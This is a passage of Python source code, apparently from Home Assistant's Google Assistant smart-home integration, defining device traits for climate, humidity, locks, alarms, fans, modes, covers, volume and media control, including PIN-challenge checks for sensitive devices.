await self.hass.services.async_call(
climate.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
return
if target_mode in self.google_to_preset:
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_PRESET_MODE,
{
climate.ATTR_PRESET_MODE: self.google_to_preset[target_mode],
ATTR_ENTITY_ID: self.state.entity_id,
},
blocking=True,
context=data.context,
)
return
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_HVAC_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
climate.ATTR_HVAC_MODE: self.google_to_hvac[target_mode],
},
blocking=True,
context=data.context,
)
@register_trait
class HumiditySettingTrait(_Trait):
"""Trait to offer humidity setting functionality.
https://developers.google.com/actions/smarthome/traits/humiditysetting
"""
name = TRAIT_HUMIDITY_SETTING
commands = [COMMAND_SET_HUMIDITY]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == humidifier.DOMAIN:
return True
return domain == sensor.DOMAIN and device_class == sensor.DEVICE_CLASS_HUMIDITY
def sync_attributes(self):
"""Return humidity attributes for a sync request."""
response = {}
attrs = self.state.attributes
domain = self.state.domain
if domain == sensor.DOMAIN:
device_class = attrs.get(ATTR_DEVICE_CLASS)
if device_class == sensor.DEVICE_CLASS_HUMIDITY:
response["queryOnlyHumiditySetting"] = True
elif domain == humidifier.DOMAIN:
response["humiditySetpointRange"] = {
"minPercent": round(
float(self.state.attributes[humidifier.ATTR_MIN_HUMIDITY])
),
"maxPercent": round(
float(self.state.attributes[humidifier.ATTR_MAX_HUMIDITY])
),
}
return response
def query_attributes(self):
"""Return humidity query attributes."""
response = {}
attrs = self.state.attributes
domain = self.state.domain
if domain == sensor.DOMAIN:
device_class = attrs.get(ATTR_DEVICE_CLASS)
if device_class == sensor.DEVICE_CLASS_HUMIDITY:
current_humidity = self.state.state
if current_humidity not in (STATE_UNKNOWN, STATE_UNAVAILABLE):
response["humidityAmbientPercent"] = round(float(current_humidity))
elif domain == humidifier.DOMAIN:
target_humidity = attrs.get(humidifier.ATTR_HUMIDITY)
if target_humidity is not None:
response["humiditySetpointPercent"] = round(float(target_humidity))
return response
async def execute(self, command, data, params, challenge):
"""Execute a humidity command."""
domain = self.state.domain
if domain == sensor.DOMAIN:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "Execute is not supported by sensor"
)
if command == COMMAND_SET_HUMIDITY:
await self.hass.services.async_call(
humidifier.DOMAIN,
humidifier.SERVICE_SET_HUMIDITY,
{
ATTR_ENTITY_ID: self.state.entity_id,
humidifier.ATTR_HUMIDITY: params["humidity"],
},
blocking=True,
context=data.context,
)
@register_trait
class LockUnlockTrait(_Trait):
"""Trait to lock or unlock a lock.
https://developers.google.com/actions/smarthome/traits/lockunlock
"""
name = TRAIT_LOCKUNLOCK
commands = [COMMAND_LOCKUNLOCK]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == lock.DOMAIN
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return True
def sync_attributes(self):
"""Return LockUnlock attributes for a sync request."""
return {}
def query_attributes(self):
"""Return LockUnlock query attributes."""
if self.state.state == STATE_JAMMED:
return {"isJammed": True}
# If its unlocking its not yet unlocked so we consider is locked
return {"isLocked": self.state.state in (STATE_UNLOCKING, STATE_LOCKED)}
async def execute(self, command, data, params, challenge):
"""Execute an LockUnlock command."""
if params["lock"]:
service = lock.SERVICE_LOCK
else:
_verify_pin_challenge(data, self.state, challenge)
service = lock.SERVICE_UNLOCK
await self.hass.services.async_call(
lock.DOMAIN,
service,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class ArmDisArmTrait(_Trait):
"""Trait to Arm or Disarm a Security System.
https://developers.google.com/actions/smarthome/traits/armdisarm
"""
name = TRAIT_ARMDISARM
commands = [COMMAND_ARMDISARM]
state_to_service = {
STATE_ALARM_ARMED_HOME: SERVICE_ALARM_ARM_HOME,
STATE_ALARM_ARMED_AWAY: SERVICE_ALARM_ARM_AWAY,
STATE_ALARM_ARMED_NIGHT: SERVICE_ALARM_ARM_NIGHT,
STATE_ALARM_ARMED_CUSTOM_BYPASS: SERVICE_ALARM_ARM_CUSTOM_BYPASS,
STATE_ALARM_TRIGGERED: SERVICE_ALARM_TRIGGER,
}
state_to_support = {
STATE_ALARM_ARMED_HOME: alarm_control_panel.const.SUPPORT_ALARM_ARM_HOME,
STATE_ALARM_ARMED_AWAY: alarm_control_panel.const.SUPPORT_ALARM_ARM_AWAY,
STATE_ALARM_ARMED_NIGHT: alarm_control_panel.const.SUPPORT_ALARM_ARM_NIGHT,
STATE_ALARM_ARMED_CUSTOM_BYPASS: alarm_control_panel.const.SUPPORT_ALARM_ARM_CUSTOM_BYPASS,
STATE_ALARM_TRIGGERED: alarm_control_panel.const.SUPPORT_ALARM_TRIGGER,
}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == alarm_control_panel.DOMAIN
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return True
def _supported_states(self):
"""Return supported states."""
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
return [
state
for state, required_feature in self.state_to_support.items()
if features & required_feature != 0
]
def sync_attributes(self):
"""Return ArmDisarm attributes for a sync request."""
response = {}
levels = []
for state in self._supported_states():
# level synonyms are generated from state names
# 'armed_away' becomes 'armed away' or 'away'
level_synonym = [state.replace("_", " ")]
if state != STATE_ALARM_TRIGGERED:
level_synonym.append(state.split("_")[1])
level = {
"level_name": state,
"level_values": [{"level_synonym": level_synonym, "lang": "en"}],
}
levels.append(level)
response["availableArmLevels"] = {"levels": levels, "ordered": False}
return response
def query_attributes(self):
"""Return ArmDisarm query attributes."""
if "next_state" in self.state.attributes:
armed_state = self.state.attributes["next_state"]
else:
armed_state = self.state.state
response = {"isArmed": armed_state in self.state_to_service}
if response["isArmed"]:
response.update({"currentArmLevel": armed_state})
return response
async def execute(self, command, data, params, challenge):
"""Execute an ArmDisarm command."""
if params["arm"] and not params.get("cancel"):
# If no arm level given, we can only arm it if there is
# only one supported arm type. We never default to triggered.
if not (arm_level := params.get("armLevel")):
states = self._supported_states()
if STATE_ALARM_TRIGGERED in states:
states.remove(STATE_ALARM_TRIGGERED)
if len(states) != 1:
raise SmartHomeError(ERR_NOT_SUPPORTED, "ArmLevel missing")
arm_level = states[0]
if self.state.state == arm_level:
raise SmartHomeError(ERR_ALREADY_ARMED, "System is already armed")
if self.state.attributes["code_arm_required"]:
_verify_pin_challenge(data, self.state, challenge)
service = self.state_to_service[arm_level]
# disarm the system without asking for code when
# 'cancel' arming action is received while current status is pending
elif (
params["arm"]
and params.get("cancel")
and self.state.state == STATE_ALARM_PENDING
):
service = SERVICE_ALARM_DISARM
else:
if self.state.state == STATE_ALARM_DISARMED:
raise SmartHomeError(ERR_ALREADY_DISARMED, "System is already disarmed")
_verify_pin_challenge(data, self.state, challenge)
service = SERVICE_ALARM_DISARM
await self.hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{
ATTR_ENTITY_ID: self.state.entity_id,
ATTR_CODE: data.config.secure_devices_pin,
},
blocking=True,
context=data.context,
)
@register_trait
class FanSpeedTrait(_Trait):
"""Trait to control speed of Fan.
https://developers.google.com/actions/smarthome/traits/fanspeed
"""
name = TRAIT_FANSPEED
commands = [COMMAND_FANSPEED, COMMAND_REVERSE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == fan.DOMAIN:
return features & fan.SUPPORT_SET_SPEED
if domain == climate.DOMAIN:
return features & climate.SUPPORT_FAN_MODE
return False
def sync_attributes(self):
"""Return speed point and modes attributes for a sync request."""
domain = self.state.domain
speeds = []
result = {}
if domain == fan.DOMAIN:
reversible = bool(
self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& fan.SUPPORT_DIRECTION
)
result.update(
{
"reversible": reversible,
"supportsFanSpeedPercent": True,
}
)
elif domain == climate.DOMAIN:
modes = self.state.attributes.get(climate.ATTR_FAN_MODES) or []
for mode in modes:
speed = {
"speed_name": mode,
"speed_values": [{"speed_synonym": [mode], "lang": "en"}],
}
speeds.append(speed)
result.update(
{
"reversible": False,
"availableFanSpeeds": {"speeds": speeds, "ordered": True},
}
)
return result
def query_attributes(self):
"""Return speed point and modes query attributes."""
attrs = self.state.attributes
domain = self.state.domain
response = {}
if domain == climate.DOMAIN:
speed = attrs.get(climate.ATTR_FAN_MODE) or "off"
response["currentFanSpeedSetting"] = speed
if domain == fan.DOMAIN:
percent = attrs.get(fan.ATTR_PERCENTAGE) or 0
response["currentFanSpeedPercent"] = percent
return response
async def execute_fanspeed(self, data, params):
"""Execute an SetFanSpeed command."""
domain = self.state.domain
if domain == climate.DOMAIN:
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_FAN_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
climate.ATTR_FAN_MODE: params["fanSpeed"],
},
blocking=True,
context=data.context,
)
if domain == fan.DOMAIN:
await self.hass.services.async_call(
fan.DOMAIN,
fan.SERVICE_SET_PERCENTAGE,
{
ATTR_ENTITY_ID: self.state.entity_id,
fan.ATTR_PERCENTAGE: params["fanSpeedPercent"],
},
blocking=True,
context=data.context,
)
async def execute_reverse(self, data, params):
"""Execute a Reverse command."""
domain = self.state.domain
if domain == fan.DOMAIN:
if self.state.attributes.get(fan.ATTR_DIRECTION) == fan.DIRECTION_FORWARD:
direction = fan.DIRECTION_REVERSE
else:
direction = fan.DIRECTION_FORWARD
await self.hass.services.async_call(
fan.DOMAIN,
fan.SERVICE_SET_DIRECTION,
{ATTR_ENTITY_ID: self.state.entity_id, fan.ATTR_DIRECTION: direction},
blocking=True,
context=data.context,
)
async def execute(self, command, data, params, challenge):
"""Execute a smart home command."""
if command == COMMAND_FANSPEED:
await self.execute_fanspeed(data, params)
elif command == COMMAND_REVERSE:
await self.execute_reverse(data, params)
@register_trait
class ModesTrait(_Trait):
"""Trait to set modes.
https://developers.google.com/actions/smarthome/traits/modes
"""
name = TRAIT_MODES
commands = [COMMAND_MODES]
SYNONYMS = {
"preset mode": ["preset mode", "mode", "preset"],
"sound mode": ["sound mode", "effects"],
"option": ["option", "setting", "mode", "value"],
}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == fan.DOMAIN and features & fan.SUPPORT_PRESET_MODE:
return True
if domain == input_select.DOMAIN:
return True
if domain == select.DOMAIN:
return True
if domain == humidifier.DOMAIN and features & humidifier.SUPPORT_MODES:
return True
if domain == light.DOMAIN and features & light.SUPPORT_EFFECT:
return True
if domain != media_player.DOMAIN:
return False
return features & media_player.SUPPORT_SELECT_SOUND_MODE
def _generate(self, name, settings):
"""Generate a list of modes."""
mode = {
"name": name,
"name_values": [
{"name_synonym": self.SYNONYMS.get(name, [name]), "lang": "en"}
],
"settings": [],
"ordered": False,
}
for setting in settings:
mode["settings"].append(
{
"setting_name": setting,
"setting_values": [
{
"setting_synonym": self.SYNONYMS.get(setting, [setting]),
"lang": "en",
}
],
}
)
return mode
def sync_attributes(self):
"""Return mode attributes for a sync request."""
modes = []
for domain, attr, name in (
(fan.DOMAIN, fan.ATTR_PRESET_MODES, "preset mode"),
(media_player.DOMAIN, media_player.ATTR_SOUND_MODE_LIST, "sound mode"),
(input_select.DOMAIN, input_select.ATTR_OPTIONS, "option"),
(select.DOMAIN, select.ATTR_OPTIONS, "option"),
(humidifier.DOMAIN, humidifier.ATTR_AVAILABLE_MODES, "mode"),
(light.DOMAIN, light.ATTR_EFFECT_LIST, "effect"),
):
if self.state.domain != domain:
continue
if (items := self.state.attributes.get(attr)) is not None:
modes.append(self._generate(name, items))
# Shortcut since all domains are currently unique
break
payload = {"availableModes": modes}
return payload
def query_attributes(self):
"""Return current modes."""
attrs = self.state.attributes
response = {}
mode_settings = {}
if self.state.domain == fan.DOMAIN:
if fan.ATTR_PRESET_MODES in attrs:
mode_settings["preset mode"] = attrs.get(fan.ATTR_PRESET_MODE)
elif self.state.domain == media_player.DOMAIN:
if media_player.ATTR_SOUND_MODE_LIST in attrs:
mode_settings["sound mode"] = attrs.get(media_player.ATTR_SOUND_MODE)
elif self.state.domain == input_select.DOMAIN:
mode_settings["option"] = self.state.state
elif self.state.domain == select.DOMAIN:
mode_settings["option"] = self.state.state
elif self.state.domain == humidifier.DOMAIN:
if ATTR_MODE in attrs:
mode_settings["mode"] = attrs.get(ATTR_MODE)
elif self.state.domain == light.DOMAIN and light.ATTR_EFFECT in attrs:
mode_settings["effect"] = attrs.get(light.ATTR_EFFECT)
if mode_settings:
response["on"] = self.state.state not in (STATE_OFF, STATE_UNKNOWN)
response["currentModeSettings"] = mode_settings
return response
async def execute(self, command, data, params, challenge):
"""Execute a SetModes command."""
settings = params.get("updateModeSettings")
if self.state.domain == fan.DOMAIN:
preset_mode = settings["preset mode"]
await self.hass.services.async_call(
fan.DOMAIN,
fan.SERVICE_SET_PRESET_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
fan.ATTR_PRESET_MODE: preset_mode,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == input_select.DOMAIN:
option = settings["option"]
await self.hass.services.async_call(
input_select.DOMAIN,
input_select.SERVICE_SELECT_OPTION,
{
ATTR_ENTITY_ID: self.state.entity_id,
input_select.ATTR_OPTION: option,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == select.DOMAIN:
option = settings["option"]
await self.hass.services.async_call(
select.DOMAIN,
select.SERVICE_SELECT_OPTION,
{
ATTR_ENTITY_ID: self.state.entity_id,
select.ATTR_OPTION: option,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == humidifier.DOMAIN:
requested_mode = settings["mode"]
await self.hass.services.async_call(
humidifier.DOMAIN,
humidifier.SERVICE_SET_MODE,
{
ATTR_MODE: requested_mode,
ATTR_ENTITY_ID: self.state.entity_id,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == light.DOMAIN:
requested_effect = settings["effect"]
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: self.state.entity_id,
light.ATTR_EFFECT: requested_effect,
},
blocking=True,
context=data.context,
)
return
if self.state.domain == media_player.DOMAIN and (
sound_mode := settings.get("sound mode")
):
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_SELECT_SOUND_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_SOUND_MODE: sound_mode,
},
blocking=True,
context=data.context,
)
_LOGGER.info(
"Received an Options command for unrecognised domain %s",
self.state.domain,
)
return
@register_trait
class InputSelectorTrait(_Trait):
"""Trait to set modes.
https://developers.google.com/assistant/smarthome/traits/inputselector
"""
name = TRAIT_INPUTSELECTOR
commands = [COMMAND_INPUT, COMMAND_NEXT_INPUT, COMMAND_PREVIOUS_INPUT]
SYNONYMS = {}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == media_player.DOMAIN and (
features & media_player.SUPPORT_SELECT_SOURCE
):
return True
return False
def sync_attributes(self):
"""Return mode attributes for a sync request."""
attrs = self.state.attributes
inputs = [
{"key": source, "names": [{"name_synonym": [source], "lang": "en"}]}
for source in attrs.get(media_player.ATTR_INPUT_SOURCE_LIST, [])
]
payload = {"availableInputs": inputs, "orderedInputs": True}
return payload
def query_attributes(self):
"""Return current modes."""
attrs = self.state.attributes
return {"currentInput": attrs.get(media_player.ATTR_INPUT_SOURCE, "")}
async def execute(self, command, data, params, challenge):
"""Execute an SetInputSource command."""
sources = self.state.attributes.get(media_player.ATTR_INPUT_SOURCE_LIST) or []
source = self.state.attributes.get(media_player.ATTR_INPUT_SOURCE)
if command == COMMAND_INPUT:
requested_source = params.get("newInput")
elif command == COMMAND_NEXT_INPUT:
requested_source = _next_selected(sources, source)
elif command == COMMAND_PREVIOUS_INPUT:
requested_source = _next_selected(list(reversed(sources)), source)
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")
if requested_source not in sources:
raise SmartHomeError(ERR_UNSUPPORTED_INPUT, "Unsupported input")
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_SELECT_SOURCE,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_INPUT_SOURCE: requested_source,
},
blocking=True,
context=data.context,
)
@register_trait
class OpenCloseTrait(_Trait):
"""Trait to open and close a cover.
https://developers.google.com/actions/smarthome/traits/openclose
"""
# Cover device classes that require 2FA
COVER_2FA = (
cover.DEVICE_CLASS_DOOR,
cover.DEVICE_CLASS_GARAGE,
cover.DEVICE_CLASS_GATE,
)
name = TRAIT_OPENCLOSE
commands = [COMMAND_OPENCLOSE, COMMAND_OPENCLOSE_RELATIVE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == cover.DOMAIN:
return True
return domain == binary_sensor.DOMAIN and device_class in (
binary_sensor.DEVICE_CLASS_DOOR,
binary_sensor.DEVICE_CLASS_GARAGE_DOOR,
binary_sensor.DEVICE_CLASS_LOCK,
binary_sensor.DEVICE_CLASS_OPENING,
binary_sensor.DEVICE_CLASS_WINDOW,
)
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return domain == cover.DOMAIN and device_class in OpenCloseTrait.COVER_2FA
def sync_attributes(self):
"""Return opening direction."""
response = {}
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
if self.state.domain == binary_sensor.DOMAIN:
response["queryOnlyOpenClose"] = True
response["discreteOnlyOpenClose"] = True
elif (
self.state.domain == cover.DOMAIN
and features & cover.SUPPORT_SET_POSITION == 0
):
response["discreteOnlyOpenClose"] = True
if (
features & cover.SUPPORT_OPEN == 0
and features & cover.SUPPORT_CLOSE == 0
):
response["queryOnlyOpenClose"] = True
if self.state.attributes.get(ATTR_ASSUMED_STATE):
response["commandOnlyOpenClose"] = True
return response
def query_attributes(self):
"""Return state query attributes."""
domain = self.state.domain
response = {}
# When it's an assumed state, we will return empty state
# This shouldn't happen because we set `commandOnlyOpenClose`
# but Google still queries. Erroring here will cause device
# to show up offline.
if self.state.attributes.get(ATTR_ASSUMED_STATE):
return response
if domain == cover.DOMAIN:
if self.state.state == STATE_UNKNOWN:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "Querying state is not supported"
)
position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)
if position is not None:
response["openPercent"] = position
elif self.state.state != cover.STATE_CLOSED:
response["openPercent"] = 100
else:
response["openPercent"] = 0
elif domain == binary_sensor.DOMAIN:
if self.state.state == STATE_ON:
response["openPercent"] = 100
else:
response["openPercent"] = 0
return response
async def execute(self, command, data, params, challenge):
"""Execute an Open, close, Set position command."""
domain = self.state.domain
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
if domain == cover.DOMAIN:
svc_params = {ATTR_ENTITY_ID: self.state.entity_id}
should_verify = False
if command == COMMAND_OPENCLOSE_RELATIVE:
position = self.state.attributes.get(cover.ATTR_CURRENT_POSITION)
if position is None:
raise SmartHomeError(
ERR_NOT_SUPPORTED,
"Current position not know for relative command",
)
position = max(0, min(100, position + params["openRelativePercent"]))
else:
position = params["openPercent"]
if position == 0:
service = cover.SERVICE_CLOSE_COVER
should_verify = False
elif position == 100:
service = cover.SERVICE_OPEN_COVER
should_verify = True
elif features & cover.SUPPORT_SET_POSITION:
service = cover.SERVICE_SET_COVER_POSITION
if position > 0:
should_verify = True
svc_params[cover.ATTR_POSITION] = position
else:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "No support for partial open close"
)
if (
should_verify
and self.state.attributes.get(ATTR_DEVICE_CLASS)
in OpenCloseTrait.COVER_2FA
):
_verify_pin_challenge(data, self.state, challenge)
await self.hass.services.async_call(
cover.DOMAIN, service, svc_params, blocking=True, context=data.context
)
@register_trait
class VolumeTrait(_Trait):
"""Trait to control volume of a device.
https://developers.google.com/actions/smarthome/traits/volume
"""
name = TRAIT_VOLUME
commands = [COMMAND_SET_VOLUME, COMMAND_VOLUME_RELATIVE, COMMAND_MUTE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if trait is supported."""
if domain == media_player.DOMAIN:
return features & (
media_player.SUPPORT_VOLUME_SET | media_player.SUPPORT_VOLUME_STEP
)
return False
def sync_attributes(self):
"""Return volume attributes for a sync request."""
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
return {
"volumeCanMuteAndUnmute": bool(features & media_player.SUPPORT_VOLUME_MUTE),
"commandOnlyVolume": self.state.attributes.get(ATTR_ASSUMED_STATE, False),
# Volume amounts in SET_VOLUME and VOLUME_RELATIVE are on a scale
# from 0 to this value.
"volumeMaxLevel": 100,
# Default change for queries like "Hey Google, volume up".
# 10% corresponds to the default behavior for the
# media_player.volume{up,down} services.
"levelStepSize": 10,
}
def query_attributes(self):
"""Return volume query attributes."""
response = {}
level = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
if level is not None:
# Convert 0.0-1.0 to 0-100
response["currentVolume"] = int(level * 100)
muted = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_MUTED)
if muted is not None:
response["isMuted"] = bool(muted)
return response
async def _set_volume_absolute(self, data, level):
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_VOLUME_SET,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_MEDIA_VOLUME_LEVEL: level,
},
blocking=True,
context=data.context,
)
async def _execute_set_volume(self, data, params):
level = max(0, min(100, params["volumeLevel"]))
if not (
self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& media_player.SUPPORT_VOLUME_SET
):
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
await self._set_volume_absolute(data, level / 100)
async def _execute_volume_relative(self, data, params):
relative = params["relativeSteps"]
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
if features & media_player.SUPPORT_VOLUME_SET:
current = self.state.attributes.get(media_player.ATTR_MEDIA_VOLUME_LEVEL)
target = max(0.0, min(1.0, current + relative / 100))
await self._set_volume_absolute(data, target)
elif features & media_player.SUPPORT_VOLUME_STEP:
svc = media_player.SERVICE_VOLUME_UP
if relative < 0:
svc = media_player.SERVICE_VOLUME_DOWN
relative = -relative
for _ in range(relative):
await self.hass.services.async_call(
media_player.DOMAIN,
svc,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
async def _execute_mute(self, data, params):
mute = params["mute"]
if not (
self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& media_player.SUPPORT_VOLUME_MUTE
):
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_VOLUME_MUTE,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_MEDIA_VOLUME_MUTED: mute,
},
blocking=True,
context=data.context,
)
async def execute(self, command, data, params, challenge):
"""Execute a volume command."""
if command == COMMAND_SET_VOLUME:
await self._execute_set_volume(data, params)
elif command == COMMAND_VOLUME_RELATIVE:
await self._execute_volume_relative(data, params)
elif command == COMMAND_MUTE:
await self._execute_mute(data, params)
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
def _verify_pin_challenge(data, state, challenge):
"""Verify a pin challenge."""
if not data.config.should_2fa(state):
return
if not data.config.secure_devices_pin:
raise SmartHomeError(ERR_CHALLENGE_NOT_SETUP, "Challenge is not set up")
if not challenge:
raise ChallengeNeeded(CHALLENGE_PIN_NEEDED)
if challenge.get("pin") != data.config.secure_devices_pin:
raise ChallengeNeeded(CHALLENGE_FAILED_PIN_NEEDED)
def _verify_ack_challenge(data, state, challenge):
"""Verify an ack challenge."""
if not data.config.should_2fa(state):
return
if not challenge or not challenge.get("ack"):
raise ChallengeNeeded(CHALLENGE_ACK_NEEDED)
MEDIA_COMMAND_SUPPORT_MAPPING = {
COMMAND_MEDIA_NEXT: media_player.SUPPORT_NEXT_TRACK,
COMMAND_MEDIA_PAUSE: media_player.SUPPORT_PAUSE,
COMMAND_MEDIA_PREVIOUS: media_player.SUPPORT_PREVIOUS_TRACK,
COMMAND_MEDIA_RESUME: media_player.SUPPORT_PLAY,
COMMAND_MEDIA_SEEK_RELATIVE: media_player.SUPPORT_SEEK,
COMMAND_MEDIA_SEEK_TO_POSITION: media_player.SUPPORT_SEEK,
COMMAND_MEDIA_SHUFFLE: media_player.SUPPORT_SHUFFLE_SET,
COMMAND_MEDIA_STOP: media_player.SUPPORT_STOP,
}
MEDIA_COMMAND_ATTRIBUTES = {
COMMAND_MEDIA_NEXT: "NEXT",
COMMAND_MEDIA_PAUSE: "PAUSE",
COMMAND_MEDIA_PREVIOUS: "PREVIOUS",
COMMAND_MEDIA_RESUME: "RESUME",
COMMAND_MEDIA_SEEK_RELATIVE: "SEEK_RELATIVE",
COMMAND_MEDIA_SEEK_TO_POSITION: "SEEK_TO_POSITION",
COMMAND_MEDIA_SHUFFLE: "SHUFFLE",
COMMAND_MEDIA_STOP: "STOP",
}
@register_trait
class TransportControlTrait(_Trait):
"""Trait to control media playback.
https://developers.google.com/actions/smarthome/traits/transportcontrol
"""
name = TRAIT_TRANSPORT_CONTROL
commands = [
COMMAND_MEDIA_NEXT,
COMMAND_MEDIA_PAUSE,
COMMAND_MEDIA_PREVIOUS,
COMMAND_MEDIA_RESUME,
COMMAND_MEDIA_SEEK_RELATIVE,
COMMAND_MEDIA_SEEK_TO_POSITION,
COMMAND_MEDIA_SHUFFLE,
COMMAND_MEDIA_STOP,
]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == media_player.DOMAIN:
for feature in MEDIA_COMMAND_SUPPORT_MAPPING.values():
if features & feature:
return True
return False
def sync_attributes(self):
"""Return opening direction."""
response = {}
if self.state.domain == media_player.DOMAIN:
features = self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
support = []
for command, feature in MEDIA_COMMAND_SUPPORT_MAPPING.items():
if features & feature:
support.append(MEDIA_COMMAND_ATTRIBUTES[command])
response["transportControlSupportedCommands"] = support
return response
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute a media command."""
service_attrs = {ATTR_ENTITY_ID: self.state.entity_id}
if command == COMMAND_MEDIA_SEEK_RELATIVE:
service = media_player.SERVICE_MEDIA_SEEK
rel_position = params["relativePositionMs"] / 1000
seconds_since = 0 # Default to 0 seconds
if self.state.state == STATE_PLAYING:
now = dt.utcnow()
upd_at = self.state.attributes.get(
media_player.ATTR_MEDIA_POSITION_UPDATED_AT, now
)
seconds_since = (now - upd_at).total_seconds()
position = self.state.attributes.get(media_player.ATTR_MEDIA_POSITION, 0)
max_position = self.state.attributes.get(
media_player.ATTR_MEDIA_DURATION, 0
)
service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
max(position + seconds_since + rel_position, 0), max_position
)
elif command == COMMAND_MEDIA_SEEK_TO_POSITION:
service = media_player.SERVICE_MEDIA_SEEK
max_position = self.state.attributes.get(
media_player.ATTR_MEDIA_DURATION, 0
)
service_attrs[media_player.ATTR_MEDIA_SEEK_POSITION] = min(
max(params["absPositionMs"] / 1000, 0), max_position
)
elif command == COMMAND_MEDIA_NEXT:
service = media_player.SERVICE_MEDIA_NEXT_TRACK
elif command == COMMAND_MEDIA_PAUSE:
service = media_player.SERVICE_MEDIA_PAUSE
elif command == COMMAND_MEDIA_PREVIOUS:
service = media_player.SERVICE_MEDIA_PREVIOUS_TRACK
elif command == COMMAND_MEDIA_RESUME:
service = media_player.SERVICE_MEDIA_PLAY
elif command == COMMAND_MEDIA_SHUFFLE:
service = media_player.SERVICE_SHUFFLE_SET
# Google Assistant only supports enabling shuffle
service_attrs[media_player.ATTR_MEDIA_SHUFFLE] = True
elif command == COMMAND_MEDIA_STOP:
service = media_player.SERVICE_MEDIA_STOP
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Command not supported")
await self.hass.services.async_call(
media_player.DOMAIN,
service,
service_attrs,
blocking=True,
context=data.context,
)
@register_trait
class MediaStateTrait(_Trait):
"""Trait to get media playback state.
https://developers.google.com/actions/smarthome/traits/mediastate
"""
name = TRAIT_MEDIA_STATE
commands = []
activity_lookup = {
STATE_OFF: "INACTIVE",
STATE_IDLE: "STANDBY",
STATE_PLAYING: "ACTIVE",
STATE_ON: "STANDBY",
STATE_PAUSED: "STANDBY",
STATE_STANDBY: "STANDBY",
STATE_UNAVAILABLE: "INACTIVE",
STATE_UNKNOWN: "INACTIVE",
}
playback_lookup = {
STATE_OFF: "STOPPED",
STATE_IDLE: "STOPPED",
STATE_PLAYING: "PLAYING",
STATE_ON: "STOPPED",
STATE_PAUSED: "PAUSED",
STATE_STANDBY: "STOPPED",
STATE_UNAVAILABLE: "STOPPED",
STATE_UNKNOWN: "STOPPED",
}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == media_player.DOMAIN
def sync_attributes(self):
"""Return attributes for a sync request."""
return {"supportActivityState": True, "supportPlaybackState": True}
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
return {
"activityState": self.activity_lookup.get(self.state.state, "INACTIVE"),
"playbackState": self.playback_lookup.get(self.state.state, "STOPPED"),
}
@register_trait
class ChannelTrait(_Trait):
"""Trait to get media playback state.
https://developers.google.com/actions/smarthome/traits/channel
"""
name = TRAIT_CHANNEL
commands = [COMMAND_SELECT_CHANNEL]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if (
